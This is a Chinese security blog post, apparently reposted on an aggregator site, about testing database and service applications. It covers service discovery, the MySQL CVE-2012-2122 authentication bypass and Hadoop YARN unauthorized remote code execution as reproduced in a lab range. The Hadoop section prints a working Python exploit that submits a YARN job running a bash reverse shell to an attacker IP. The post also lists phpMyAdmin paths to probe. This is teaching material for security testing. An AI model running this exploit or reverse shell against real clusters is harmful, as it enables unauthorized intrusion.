服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&未授权访问&RCE-漏洞复现

这篇具有很好参考价值的文章主要介绍了服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&未授权访问&RCE-漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、服务应用的安全问题

1、配置不当——未授权访问

2、安全机制——特定安全漏洞

3、安全机制——弱口令爆破攻击

二、服务应用的安全测试思路

1、判断服务是否开放

2、判断服务类型

3、判断利用方式

三、Mysql-未授权访问-CVE-2012-2122 利用

1、漏洞概述

2、漏洞复现

3、知识点补充

四 、Hadoop-未授权访问-内置配合命令执行 RCE

1、Hadoop简介

2、漏洞复现


一、服务应用的安全问题

1、配置不当——未授权访问

        对方在搭建服务应用的时候,采用默认配置,或者自行修改了一些安全配置,从而导致配置不当,进而会产生一些安全问题。

        其中最常见的就是由于配置不当导致的未授权访问。

2、安全机制——特定安全漏洞

        未授权访问一般是由于配置不当所导致的,也就是说软件本身没有问题, 而安全机制这部分主要就是软件或者应用服务本身存在的问题,与配置无关。 

3、安全机制——弱口令爆破攻击

        有些服务是通过口令验证来去判断服务的启动和禁用的,比如数据库里面有一些数据库里面就内置的数据库的用户,包括账号和密码,如果说设置的这个账号和密码过于简单的话,那么攻击者就可以通过弱口令的猜解得到账号以及密码之后进入,来进行一些安全的测试。

二、服务应用的安全测试思路

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

1、判断服务是否开放

        因为我们讲的是服务的安全问题,也就是说如果当前服务没有的话,那么当前服务的安全问题肯定也就不存在了,也就没有继续进行测试的必要性了。

  • 端口扫描

        可以使用namp等工具,其原理是如果服务想要开启,就需要开放一个对应的端口,这些端口大部分都是默认的,也就是说可以根据端口号来判断某个服务是否开放。如mysql数据库的默认端口号是3306;Oracle数据库的默认端口号是1521;sql server数据库的默认端口号是1433;Redis数据库的默认端口号是6379。

        当然使用者也可以修改端口号,但是一般是不会进行修改的。

        但是有一种特殊情况,服务明明开放了,但是端口却没有开放是因为什么呢?

        三方面原因:

        (1)其处于内网(主要原因)。

                因为其服务是放在内网主机上面的,在内网内开了许多服务(端口 ),比如web和数据库,但是其只将web映射到外网,所以我们只能看到其服务在外网是开的,但是在进行扫描的时候我们扫描的仅仅是组网主机,而组网主机会将数据转发到内网再做处理,所以我们检测不到对应服务端口的开放。

        (2)端口被修改(可能性较小)。

        (3)防护应用的干扰。

  • 组合猜解

        就是我们要知道,比如有A服务,那么就有很大的可能会有B服务。

  • 信息来源

        有一些服务,会在我们进行一些安全测试的过程中,返回一些报错或者提示,进而我们可以根据此来知道有某些服务。

2、判断服务类型

        根据服务类型来判断存在什么服务,进而来判断可能存在哪些安全问题以及如何来利用存在的安全问题。

  • 数据库
  • 文件传输
  • 远程控制

        比如远程连接Windows系统的远程桌面协议(RDP),使用的 TCP 端口是3389。Linux 系统,可以使用 SSH(Secure Shell)协议进行远程访问和控制,使用的 TCP 端口是22。在连接的时候,需要输入正确的账号和密码,在这个过程中关键点就在此,如果得到了账号和密码,攻击者就可以直接连接上,就相当于拿下了这台服务器。攻击者就可以使用密码爆破来进行攻击。

  • 数据通讯

3、判断利用方式

        就是利用我们前面判断出来的存在的服务以及服务类型来判断如何利用可能存在的安全问题来进行下一步的操作。

  • 特性漏洞

        根据这个服务本身存在的安全问题来进行利用。

  • 未授权访问

       对方对服务应用的配置不当,可能会存在未授权访问。

  • 弱口令爆破

        涉及到账号密码,就可以采用账号密码方面的爆破猜解。

三、Mysql-未授权访问-CVE-2012-2122 利用

1、漏洞概述

  • 影响版本:
    • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
    • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
  • 漏洞描述:

        当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

2、漏洞复现

        首先将环境启动起来。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        在网上随便找一个扫描接口来对环境的开放端口进行扫描,在下图位置输入ip。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        探针结果如下图所示,可以看到3306端口开放,因此我们可以知道mysql服务存在。  

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        接下来我们就来判断上面写的漏洞是否存在,只需要执行下面的命令。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        将上图所示的命令执行后效果如下图所示,可以看到因为密码错误,就一直报错,但是在某一刻,没有再报错,而是直接进入到了数据库里面。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

3、知识点补充

        mysql默认配置只能本地登陆root用户,远程的连接请求时被拒绝的,那么我们就无法来对其进行密码爆破了,因为我们连接都连接不上。

        因此我们就只能使用类似phpMyAdmin来进行猜解,因为其属于第三方的数据库管理应用,其搭建在对方的服务器上,因此就可以借助其来登陆数据库,此时数据的发送就是从本地到本地,所以可能进行测试。

        那么如何来判断网站是否存在phpMyAdmin呢,可以使用浏览器访问网站并尝试在URL地址栏输入以下内容(也可以使用目录扫描工具直接进行扫描,观察是否存在相关路径):

  • /phpmyadmin
  • /pma
  • /myadmin
  • /mysql

        如果看到了phpMyAdmin的登录页面,那么该网站很可能存在phpMyAdmin,并且可以使用默认的登录凭据进行登录。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        如果您看到一个404错误页面,那么该网站可能不存在phpMyAdmin,或者它已经被移动到其他位置。

        但是请注意,即使看不到上述URL之一,也不能完全排除该网站存在phpMyAdmin的可能性。管理员可能已经将phpMyAdmin重命名或移动到其他位置以避免被发现,因此在评估网站的安全性时,还需要进行其他安全检查。

四 、Hadoop-未授权访问-内置配合命令执行 RCE

1、Hadoop简介

        Hadoop是一个开源的分布式计算平台,用于处理大规模数据集。它提供了分布式存储和分布式处理能力,可以在大规模服务器集群上进行高效的数据处理。

        通常被用于处理大规模的数据集,如数据分析、数据挖掘、机器学习等应用场景。它的设计理念是通过将大规模数据分割成多个数据块,并在多个计算节点上并行处理这些数据块,从而实现高效的数据处理。

        常用的端口配置如下(我们平时主要看的是50010端口): 

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

2、漏洞复现

        进入靶场后,在数据库选项内选择“Hadoop”。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        启动环境。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        进入靶场提供的地址。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        访问/cluster/apps页面:(该页面存在说明存在未授权访问漏洞)。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        使用以下官方exp反弹shell。

#!/usr/bin/env python

import requests

target = 'http://123.58.236.76:31367/' # 将这里更改为目标主机地址,监听端口为9999
lhost = '47.94.236.117' # 输入你的ip地址(外网反弹地址)在这里,是用来接收shell的回连地址,监听端口为9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

        在桌面创建一个py文件来保存上面的exp。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        输入下面的命令开始对7777端口进行监听。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        进入cmd输入下面的命令来执行刚刚创建好的exp。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop

        可以看到成功接收到了反弹。

hadoop rce,网络安全,服务应用安全,漏洞复现,mysql,hadoop


接下篇文章:https://blog.csdn.net/weixin_62808713/article/details/130451511文章来源地址https://www.toymoban.com/news/detail-580271.html


到了这里,关于服务攻防-数据库安全-服务应用的安全问题以及测试流程-Mysql&Hadoop&未授权访问&RCE-漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全全栈培训笔记(55-服务攻防-数据库安全&Redis&Hadoop&Mysqla&未授权访问&RCE)

    知识点: 1、服务攻防数据库类型安全 2、RedisHadoopMysql安全 3、Mysql-CVE-2012-2122漏洞 4、Hadoop-配置不当未授权三重奏RCE漏洞 3、Redis-配置不当未授权三重奏RCE两漏洞 #章节内容: 常见服务应用的安全测试: 1、配置不当-未授权访问 2、安全机制特定安全漏洞 3、安全机制弱口令爆

    2024年01月23日
    浏览(47)
  • 041-WEB攻防-ASP应用&HTTP.SYS&短文件&文件解析&Access注入&数据库泄漏

    1、ASP-SQL注入-Access数据库 2、ASP-默认安装-数据库泄漏下载 3、ASP-IIS-CVE短文件解析写入 演示案例: ➢ASP-默认安装-MDB数据库泄漏下载 ➢ASP-中间件-CVE短文件解析写权限 ➢ASP-SQL注入-SQLMAP使用ACCESS注入 由于大部分 ASP程序与ACCESS数据库搭建 ,但ACCESS无需连接 在== 脚本文件中定义

    2024年04月13日
    浏览(45)
  • mysql5.7数据库配置(安全以及binlog)

    1、安装validate_password插件: 登录mysql,查询已安装的插件: show plugins; 查询mysql插件目录位置: show variables like “%plugin_dir%”; 找到对应的目录,mysql自带 validate_password,然后我们将这个插件进行安装 通过命令行安装(可以不用重启服务): install plugin validate_password soname ‘vali

    2024年01月18日
    浏览(55)
  • JanusGraph图数据库的应用以及知识图谱技术介绍

    目录 JanusGraph介绍 JanusGraph 的主要优势 JanusGraph的应用: JanusGraph 的行业应用: 架构概览 分布式技术应用 横向扩展能力 程序与janus的交互 Janus与图数据库相关概念 结构化存储 图结构存储 实体关系存储 知识存储技术 JanusGraph 是一个开源的、分布式的、基于属性图的数据库,

    2024年01月24日
    浏览(66)
  • 【MySQL数据库】--- 初识数据库以及MySQL数据库在Linux云服务器下载(详细教程)

    🍎 博客主页:🌙@披星戴月的贾维斯 🍎 欢迎关注:👍点赞🍃收藏🔥留言 🍇系列专栏:🌙 MYSQL数据库 🌙请不要相信胜利就像山坡上的蒲公英一样唾手可得,但是请相信,世界上总有一些美好值得我们全力以赴,哪怕粉身碎骨!🌙 🍉一起加油,去追寻、去成为更好的自

    2024年02月03日
    浏览(60)
  • 【MySQL数据库】--- 初始数据库以及MySQL数据库在Linux云服务器下载(详细教程)

    🍎 博客主页:🌙@披星戴月的贾维斯 🍎 欢迎关注:👍点赞🍃收藏🔥留言 🍇系列专栏:🌙 MYSQL数据库 🌙请不要相信胜利就像山坡上的蒲公英一样唾手可得,但是请相信,世界上总有一些美好值得我们全力以赴,哪怕粉身碎骨!🌙 🍉一起加油,去追寻、去成为更好的自

    2023年04月24日
    浏览(72)
  • IDEA连接数据库,以及报错问题

    IDEA是一款功能强大的开发工具,而IDEA连接数据库是其中的一个附带功能,该功能可以在我们开发大型任务,编写SQL语句时,提供帮助,例如以MySQL为例 解决SQL映射文件的警告提示: 在映射配置文件中存在报红的情况。问题如下: 产生的原因:Idea和数据库没有建立连接,不

    2023年04月22日
    浏览(49)
  • unity 3d与服务器以及数据库进行数据交互!!!(UnityWebRequest)

    数字孪生最重要的一步便是数据的通信,这里的数据通信包含了,数字模型和物理模型之间的通信。而对于数字模型在前面的介绍(跳转前面介绍的),我们采用的是unity3d来完成的,当然这里介绍的数据交互,重要也是以unity3d来介绍,但是大致的思想和原理都是一样的。下

    2024年02月12日
    浏览(41)
  • 数据库攻防学习之MySQL

    0x01mysql学习 MySQL 是瑞典的MySQLAB公司开发的一个可用于各种流行操作系统平台的关系数据库系统,它具有客户机/服务器体系结构的分布式数据库管理系统。可以免费使用使用,用的人数很多。 0x02环境搭建 这里演示用,phpstudy搭建的环境,然后安装phpmyadmin 0x03漏洞复现 日志文

    2024年02月03日
    浏览(28)
  • 数据库攻防学习之Redis

    0x01 redis学习 在渗透测试面试或者网络安全面试中可能会常问redis未授权等一些知识,那么什么是redis?redis就是个数据库,常见端口为6379,常见漏洞为未授权访问。 0x02 环境搭建 这里可以自己搭建一个redis环境,也可以用vulfocus搭建一个环境,可以两个都搭建,因为一些攻击

    2024年02月03日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包